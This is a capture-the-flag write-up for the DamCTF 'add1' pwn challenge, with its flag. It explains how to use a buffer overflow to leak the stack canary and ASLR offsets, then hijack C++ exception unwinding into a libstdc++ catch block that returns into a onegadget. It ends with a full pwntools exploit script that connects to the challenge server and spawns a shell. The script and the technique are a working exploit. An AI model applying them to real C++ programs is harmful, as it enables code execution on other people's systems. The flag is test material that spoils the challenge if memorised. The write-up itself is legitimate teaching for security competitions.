# add1

## Description

```
Remember to add 1! I even wrote a program to do it for you.
```

### Flag

`dam{d1d_y0u_know_th4t_stack_unwind1ng_subtr4cts_0ne_from_th3_r3turn_addre55_bec4use_th3_return_4dr3ss_p01nts_to_th3_1nstructi0n_after_th3_call}`

## Info

**Q:** You’re given a short program with a leak and a stack buffer overflow in `main` — but `main` never returns, so how can you hijack the control flow?

**A:** C++ exceptions! The program calls `std::stoi` on the user input, which will throw an exception if the input is not numerical. When an exception is thrown, the runtime uses DWARF frame information to walk the stack and determine if any return addresses lie inside of `try` blocks. If so, execution jumps to the corresponding `catch` block (which may choose to either rethrow the exception or consume it). This means that if an exception is thrown up a corrupt, attacker-controlled stack, you can redirect execution to any `catch` block in the program.

The full solution to the challenge is:

- Use a buffer-overflow/null-termination bug to leak ASLR offsets and the stack canary. (`std::stoi` stops parsing when it encounters whitespace, so if you overflow the buffer with inputs like `0                   `, you can leak values off the stack when the user input is echoed back, without raising an exception.)
- Look around in `libstdc++` for a `catch` block that just ignores the exception and returns from its function. I used this one: <https://github.com/gcc-mirror/gcc/blob/4b8e7b57d952a1031b0fe11533ef76b9821432c0/libstdc%2B%2B-v3/src/c%2B%2B98/ios_init.cc#L144>
    - A good way to narrow down the search space is to search for references to `__cxa_end_catch`, which is called by `catch` blocks that do not rethrow the exception.
- Use the buffer overflow to construct a stack with a return address pointing into the corresponding `try` block, followed by a ROP chain/onegadget.
- Trigger an exception. The exception will be caught by the `catch` block, which will return into your ROP chain.

There’s one caveat that‘s tripped me up before: when the runtime is unwinding the stack, **it subtracts 1 from each return address** before looking up the address to see if it lies inside a `try` block. This is because when a function is called the return address points to the instruction *after* the call — so if the last instruction of a `try` block is a call, the return address would point one byte past the end of the `try`, and subtracting 1 is necessary. (This applies in pretty much any stack unwinding scenario — debuggers, backtraces, etc. always subtract 1 from any return address before looking up information about it.)

Therefore, after you’ve determined the address of a useful `try` block, you can’t just use its starting address as your return address — you have to remember to add 1!

# Exploit script

```python
#!/usr/bin/env python3

from pwn import *

exe = ELF("./add1_patched")
libc = ELF("./libc.so.6")

context.binary = exe
debug_script='''
decompiler connect binja
#b mygets
#b stoi(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long*, int)
#c
'''

def conn():
    if args.REMOTE:
        p = remote("chals.damctf.xyz", 30123)
    elif args.D:
        p = gdb.debug([exe.path], gdbscript=debug_script, env=[('SHELL', '/bin/bash')])
    else:
        p = process([exe.path])

    return p

def main():
    p = conn()

    # tick 197 certified
    def leak(offset):
        p.recvuntil(b"Enter a number: ")
        payload = b"0" + b" "*(offset-1)
        p.send(payload + b"\n")

        p.recvuntil(payload)
        return p.recvuntil(b" + 1 is 1\n", drop=True)

    canary = unpack(b'\x00' + leak(0x19)[:7])
    print("canary", hex(canary))

    libc_base = unpack(leak(0x38), "all") - 0x29d90
    print("libc base:", hex(libc_base))

    base = unpack(leak(0x48), "all") - 0x157a5
    print("image base:", hex(base))

    rbp = unpack(leak(0x58), "all")
    print("rbp", hex(base))

    p.recvuntil(b"Enter a number: ")

    landingpad = base + 0x17732
    onegadget = libc_base + 0xebce2
    popr13 = base + 0x16353
    exploit = (b"a" * 0x18 
        + p64(canary)
        + b"b" * 0x10
        + p64(rbp)
        + p64(landingpad) 
        + b"z" * 0x8
        + p64(popr13)
        + p64(0)
        + p64(onegadget) 
        + b"\n")
    print(b"Sending:", exploit)
    p.send(exploit)

    p.interactive()


if __name__ == "__main__":
    main()
```
